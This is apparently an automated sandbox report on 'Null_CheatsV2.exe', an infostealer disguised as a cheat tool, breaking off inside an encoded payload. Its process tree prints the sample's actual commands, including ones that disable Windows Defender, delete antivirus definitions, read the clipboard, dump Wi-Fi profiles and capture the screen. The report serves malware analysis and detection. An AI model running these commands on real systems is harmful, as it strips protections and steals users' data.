44eaf962f6e753754cfd154638ffefebf1b5d8b6c78f55a8dbe580b56336d01e

Resubmissions

27-12-2024 18:30

241227-w5w87axrcq 10

27-12-2024 17:44

241227-wbk9tsxpfq 10

Analysis

max time kernel
467s
max time network
679s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
27-12-2024 18:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Null_CheatsV2.exe
Size

6.9MB
MD5

3cc77edfbffc973a392bc6f3548f89dd
SHA1

26977a68408dc4fc3da11eda6b0295685b4eda67
SHA256

44eaf962f6e753754cfd154638ffefebf1b5d8b6c78f55a8dbe580b56336d01e
SHA512

9e22c7043420e34e5e949fdd1a0e6fa67a9b7e38ca6da77c9277235cfefbf07f34d514d28d9a8c13595af0c760cb8f5558945814b1e810e6d96feb2064785b10
SSDEEP

98304:5OdzdbM+Q2y+aoWwQtjOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/Bb2EJ1nL2hB0Lq:5AfmOjmFQR4MVGFtwLPmnL2hq+

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence phishing privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
3044	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2984	powershell.exe
816	powershell.exe
2108	powershell.exe
3876	powershell.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: sweetalert2@11
phishing

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3608	cmd.exe
1680	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3040	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe
2708	Null_CheatsV2.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
19	discord.com
20	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1100	tasklist.exe
3316	tasklist.exe
1692	tasklist.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x002800000004623c-21.dat	upx
behavioral1/memory/2708-25-0x00007FFDC53D0000-0x00007FFDC59B9000-memory.dmp	upx
behavioral1/files/0x002800000004622f-27.dat	upx
behavioral1/files/0x0028000000046239-34.dat	upx
behavioral1/memory/2708-32-0x00007FFDDDF50000-0x00007FFDDDF5F000-memory.dmp	upx
behavioral1/files/0x002800000004623a-31.dat	upx
behavioral1/files/0x002800000004623f-38.dat	upx
behavioral1/files/0x002800000004623b-35.dat	upx
behavioral1/memory/2708-30-0x00007FFDD8FF0000-0x00007FFDD9013000-memory.dmp	upx
behavioral1/files/0x0028000000046231-43.dat	upx
behavioral1/files/0x0028000000046236-48.dat	upx
behavioral1/files/0x0028000000046235-47.dat	upx
behavioral1/files/0x0028000000046232-44.dat	upx
behavioral1/files/0x0028000000046233-45.dat	upx
behavioral1/files/0x0028000000046234-46.dat	upx
behavioral1/files/0x0028000000046230-42.dat	upx
behavioral1/files/0x002800000004622e-41.dat	upx
behavioral1/files/0x0028000000046241-40.dat	upx
behavioral1/files/0x0028000000046240-39.dat	upx
behavioral1/memory/2708-54-0x00007FFDD4290000-0x00007FFDD42BD000-memory.dmp	upx
behavioral1/memory/2708-56-0x00007FFDD43D0000-0x00007FFDD43E9000-memory.dmp	upx
behavioral1/memory/2708-58-0x00007FFDD4260000-0x00007FFDD4283000-memory.dmp	upx
behavioral1/memory/2708-60-0x00007FFDC4F50000-0x00007FFDC50C0000-memory.dmp	upx
behavioral1/memory/2708-62-0x00007FFDD3CB0000-0x00007FFDD3CC9000-memory.dmp	upx
behavioral1/memory/2708-64-0x00007FFDD4250000-0x00007FFDD425D000-memory.dmp	upx
behavioral1/memory/2708-66-0x00007FFDD0110000-0x00007FFDD013E000-memory.dmp	upx
behavioral1/memory/2708-74-0x00007FFDD8FF0000-0x00007FFDD9013000-memory.dmp	upx
behavioral1/memory/2708-73-0x00007FFDC48C0000-0x00007FFDC4C39000-memory.dmp	upx
behavioral1/memory/2708-71-0x00007FFDC5140000-0x00007FFDC51F8000-memory.dmp	upx
behavioral1/memory/2708-70-0x00007FFDC53D0000-0x00007FFDC59B9000-memory.dmp	upx
behavioral1/memory/2708-77-0x00007FFDD00F0000-0x00007FFDD0104000-memory.dmp	upx
behavioral1/memory/2708-76-0x00007FFDDDF50000-0x00007FFDDDF5F000-memory.dmp	upx
behavioral1/memory/2708-79-0x00007FFDD4290000-0x00007FFDD42BD000-memory.dmp	upx
behavioral1/memory/2708-82-0x00007FFDC4100000-0x00007FFDC421C000-memory.dmp	upx
behavioral1/memory/2708-80-0x00007FFDD3FD0000-0x00007FFDD3FDD000-memory.dmp	upx
behavioral1/memory/2708-129-0x00007FFDD4260000-0x00007FFDD4283000-memory.dmp	upx
behavioral1/memory/2708-182-0x00007FFDC4F50000-0x00007FFDC50C0000-memory.dmp	upx
behavioral1/memory/2708-246-0x00007FFDD3CB0000-0x00007FFDD3CC9000-memory.dmp	upx
behavioral1/memory/2708-272-0x00007FFDD0110000-0x00007FFDD013E000-memory.dmp	upx
behavioral1/memory/2708-278-0x00007FFDC5140000-0x00007FFDC51F8000-memory.dmp	upx
behavioral1/memory/2708-290-0x00007FFDC48C0000-0x00007FFDC4C39000-memory.dmp	upx
behavioral1/memory/2708-302-0x00007FFDD8FF0000-0x00007FFDD9013000-memory.dmp	upx
behavioral1/memory/2708-307-0x00007FFDC4F50000-0x00007FFDC50C0000-memory.dmp	upx
behavioral1/memory/2708-301-0x00007FFDC53D0000-0x00007FFDC59B9000-memory.dmp	upx
behavioral1/memory/2708-336-0x00007FFDD4260000-0x00007FFDD4283000-memory.dmp	upx
behavioral1/memory/2708-341-0x00007FFDC5140000-0x00007FFDC51F8000-memory.dmp	upx
behavioral1/memory/2708-340-0x00007FFDD0110000-0x00007FFDD013E000-memory.dmp	upx
behavioral1/memory/2708-339-0x00007FFDD4250000-0x00007FFDD425D000-memory.dmp	upx
behavioral1/memory/2708-338-0x00007FFDD3CB0000-0x00007FFDD3CC9000-memory.dmp	upx
behavioral1/memory/2708-337-0x00007FFDC4F50000-0x00007FFDC50C0000-memory.dmp	upx
behavioral1/memory/2708-335-0x00007FFDD43D0000-0x00007FFDD43E9000-memory.dmp	upx
behavioral1/memory/2708-334-0x00007FFDD4290000-0x00007FFDD42BD000-memory.dmp	upx
behavioral1/memory/2708-333-0x00007FFDDDF50000-0x00007FFDDDF5F000-memory.dmp	upx
behavioral1/memory/2708-332-0x00007FFDD8FF0000-0x00007FFDD9013000-memory.dmp	upx
behavioral1/memory/2708-331-0x00007FFDC48C0000-0x00007FFDC4C39000-memory.dmp	upx
behavioral1/memory/2708-330-0x00007FFDC4100000-0x00007FFDC421C000-memory.dmp	upx
behavioral1/memory/2708-329-0x00007FFDD3FD0000-0x00007FFDD3FDD000-memory.dmp	upx
behavioral1/memory/2708-328-0x00007FFDD00F0000-0x00007FFDD0104000-memory.dmp	upx
behavioral1/memory/2708-316-0x00007FFDC53D0000-0x00007FFDC59B9000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1956	cmd.exe
4640	netsh.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2468	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
820	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3829776853-2076861744-2973657197-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
3876	powershell.exe
2984	powershell.exe
3876	powershell.exe
4672	WMIC.exe
4672	WMIC.exe
4672	WMIC.exe
4672	WMIC.exe
2984	powershell.exe
2984	powershell.exe
1680	powershell.exe
1680	powershell.exe
1680	powershell.exe
2088	powershell.exe
2088	powershell.exe
2088	powershell.exe
816	powershell.exe
816	powershell.exe
2000	powershell.exe
2000	powershell.exe
1168	WMIC.exe
1168	WMIC.exe
1168	WMIC.exe
1168	WMIC.exe
4556	WMIC.exe
4556	WMIC.exe
4556	WMIC.exe
4556	WMIC.exe
4980	WMIC.exe
4980	WMIC.exe
4980	WMIC.exe
4980	WMIC.exe
2108	powershell.exe
2108	powershell.exe
2468	WMIC.exe
2468	WMIC.exe
2468	WMIC.exe
2468	WMIC.exe
4904	powershell.exe
4904	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	3316	tasklist.exe
Token: SeDebugPrivilege	1100	tasklist.exe
Token: SeDebugPrivilege	1692	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4672	WMIC.exe
Token: SeSecurityPrivilege	4672	WMIC.exe
Token: SeTakeOwnershipPrivilege	4672	WMIC.exe
Token: SeLoadDriverPrivilege	4672	WMIC.exe
Token: SeSystemProfilePrivilege	4672	WMIC.exe
Token: SeSystemtimePrivilege	4672	WMIC.exe
Token: SeProfSingleProcessPrivilege	4672	WMIC.exe
Token: SeIncBasePriorityPrivilege	4672	WMIC.exe
Token: SeCreatePagefilePrivilege	4672	WMIC.exe
Token: SeBackupPrivilege	4672	WMIC.exe
Token: SeRestorePrivilege	4672	WMIC.exe
Token: SeShutdownPrivilege	4672	WMIC.exe
Token: SeDebugPrivilege	4672	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4672	WMIC.exe
Token: SeRemoteShutdownPrivilege	4672	WMIC.exe
Token: SeUndockPrivilege	4672	WMIC.exe
Token: SeManageVolumePrivilege	4672	WMIC.exe
Token: 33	4672	WMIC.exe
Token: 34	4672	WMIC.exe
Token: 35	4672	WMIC.exe
Token: 36	4672	WMIC.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeIncreaseQuotaPrivilege	4672	WMIC.exe
Token: SeSecurityPrivilege	4672	WMIC.exe
Token: SeTakeOwnershipPrivilege	4672	WMIC.exe
Token: SeLoadDriverPrivilege	4672	WMIC.exe
Token: SeSystemProfilePrivilege	4672	WMIC.exe
Token: SeSystemtimePrivilege	4672	WMIC.exe
Token: SeProfSingleProcessPrivilege	4672	WMIC.exe
Token: SeIncBasePriorityPrivilege	4672	WMIC.exe
Token: SeCreatePagefilePrivilege	4672	WMIC.exe
Token: SeBackupPrivilege	4672	WMIC.exe
Token: SeRestorePrivilege	4672	WMIC.exe
Token: SeShutdownPrivilege	4672	WMIC.exe
Token: SeDebugPrivilege	4672	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4672	WMIC.exe
Token: SeRemoteShutdownPrivilege	4672	WMIC.exe
Token: SeUndockPrivilege	4672	WMIC.exe
Token: SeManageVolumePrivilege	4672	WMIC.exe
Token: 33	4672	WMIC.exe
Token: 34	4672	WMIC.exe
Token: 35	4672	WMIC.exe
Token: 36	4672	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3876	powershell.exe
Token: SeSecurityPrivilege	3876	powershell.exe
Token: SeTakeOwnershipPrivilege	3876	powershell.exe
Token: SeLoadDriverPrivilege	3876	powershell.exe
Token: SeSystemProfilePrivilege	3876	powershell.exe
Token: SeSystemtimePrivilege	3876	powershell.exe
Token: SeProfSingleProcessPrivilege	3876	powershell.exe
Token: SeIncBasePriorityPrivilege	3876	powershell.exe
Token: SeCreatePagefilePrivilege	3876	powershell.exe
Token: SeBackupPrivilege	3876	powershell.exe
Token: SeRestorePrivilege	3876	powershell.exe
Token: SeShutdownPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeSystemEnvironmentPrivilege	3876	powershell.exe
Token: SeRemoteShutdownPrivilege	3876	powershell.exe
Token: SeUndockPrivilege	3876	powershell.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
1012	7zG.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe
4160	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4160	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1988 wrote to memory of 2708	1988	Null_CheatsV2.exe	83
PID 1988 wrote to memory of 2708	1988	Null_CheatsV2.exe	83
PID 2708 wrote to memory of 1588	2708	Null_CheatsV2.exe	85
PID 2708 wrote to memory of 1588	2708	Null_CheatsV2.exe	85
PID 2708 wrote to memory of 1004	2708	Null_CheatsV2.exe	86
PID 2708 wrote to memory of 1004	2708	Null_CheatsV2.exe	86
PID 2708 wrote to memory of 3220	2708	Null_CheatsV2.exe	87
PID 2708 wrote to memory of 3220	2708	Null_CheatsV2.exe	87
PID 3220 wrote to memory of 5088	3220	cmd.exe	91
PID 3220 wrote to memory of 5088	3220	cmd.exe	91
PID 1004 wrote to memory of 3876	1004	cmd.exe	92
PID 1004 wrote to memory of 3876	1004	cmd.exe	92
PID 1588 wrote to memory of 2984	1588	cmd.exe	93
PID 1588 wrote to memory of 2984	1588	cmd.exe	93
PID 2708 wrote to memory of 4832	2708	Null_CheatsV2.exe	94
PID 2708 wrote to memory of 4832	2708	Null_CheatsV2.exe	94
PID 2708 wrote to memory of 1960	2708	Null_CheatsV2.exe	95
PID 2708 wrote to memory of 1960	2708	Null_CheatsV2.exe	95
PID 2708 wrote to memory of 1508	2708	Null_CheatsV2.exe	98
PID 2708 wrote to memory of 1508	2708	Null_CheatsV2.exe	98
PID 2708 wrote to memory of 3608	2708	Null_CheatsV2.exe	99
PID 2708 wrote to memory of 3608	2708	Null_CheatsV2.exe	99
PID 2708 wrote to memory of 1700	2708	Null_CheatsV2.exe	100
PID 2708 wrote to memory of 1700	2708	Null_CheatsV2.exe	100
PID 1960 wrote to memory of 1100	1960	cmd.exe	105
PID 1960 wrote to memory of 1100	1960	cmd.exe	105
PID 4832 wrote to memory of 3316	4832	cmd.exe	104
PID 4832 wrote to memory of 3316	4832	cmd.exe	104
PID 1508 wrote to memory of 4672	1508	cmd.exe	106
PID 1508 wrote to memory of 4672	1508	cmd.exe	106
PID 3608 wrote to memory of 1680	3608	cmd.exe	107
PID 3608 wrote to memory of 1680	3608	cmd.exe	107
PID 2708 wrote to memory of 3028	2708	Null_CheatsV2.exe	108
PID 2708 wrote to memory of 3028	2708	Null_CheatsV2.exe	108
PID 2708 wrote to memory of 1956	2708	Null_CheatsV2.exe	110
PID 2708 wrote to memory of 1956	2708	Null_CheatsV2.exe	110
PID 1700 wrote to memory of 1692	1700	cmd.exe	109
PID 1700 wrote to memory of 1692	1700	cmd.exe	109
PID 2708 wrote to memory of 4680	2708	Null_CheatsV2.exe	113
PID 2708 wrote to memory of 4680	2708	Null_CheatsV2.exe	113
PID 2708 wrote to memory of 4584	2708	Null_CheatsV2.exe	115
PID 2708 wrote to memory of 4584	2708	Null_CheatsV2.exe	115
PID 1956 wrote to memory of 4640	1956	cmd.exe	118
PID 1956 wrote to memory of 4640	1956	cmd.exe	118
PID 3028 wrote to memory of 4964	3028	cmd.exe	119
PID 3028 wrote to memory of 4964	3028	cmd.exe	119
PID 4680 wrote to memory of 820	4680	cmd.exe	120
PID 4680 wrote to memory of 820	4680	cmd.exe	120
PID 4584 wrote to memory of 2088	4584	cmd.exe	121
PID 4584 wrote to memory of 2088	4584	cmd.exe	121
PID 2708 wrote to memory of 1944	2708	Null_CheatsV2.exe	123
PID 2708 wrote to memory of 1944	2708	Null_CheatsV2.exe	123
PID 1944 wrote to memory of 1812	1944	cmd.exe	125
PID 1944 wrote to memory of 1812	1944	cmd.exe	125
PID 2708 wrote to memory of 560	2708	Null_CheatsV2.exe	145
PID 2708 wrote to memory of 560	2708	Null_CheatsV2.exe	145
PID 560 wrote to memory of 648	560	cmd.exe	144
PID 560 wrote to memory of 648	560	cmd.exe	144
PID 2708 wrote to memory of 3696	2708	Null_CheatsV2.exe	129
PID 2708 wrote to memory of 3696	2708	Null_CheatsV2.exe	129
PID 3696 wrote to memory of 3668	3696	cmd.exe	132
PID 3696 wrote to memory of 3668	3696	cmd.exe	132
PID 2088 wrote to memory of 3448	2088	powershell.exe	131
PID 2088 wrote to memory of 3448	2088	powershell.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe
"C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1988
- C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe
  "C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3876
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Null_AntiVirus had a error when running please try again soon.', 0, 'ERROR', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3220
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Null_AntiVirus had a error when running please try again soon.', 0, 'ERROR', 0+16);close()"
      4⤵
      PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1508
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1700
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3028
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:1956
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4680
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4A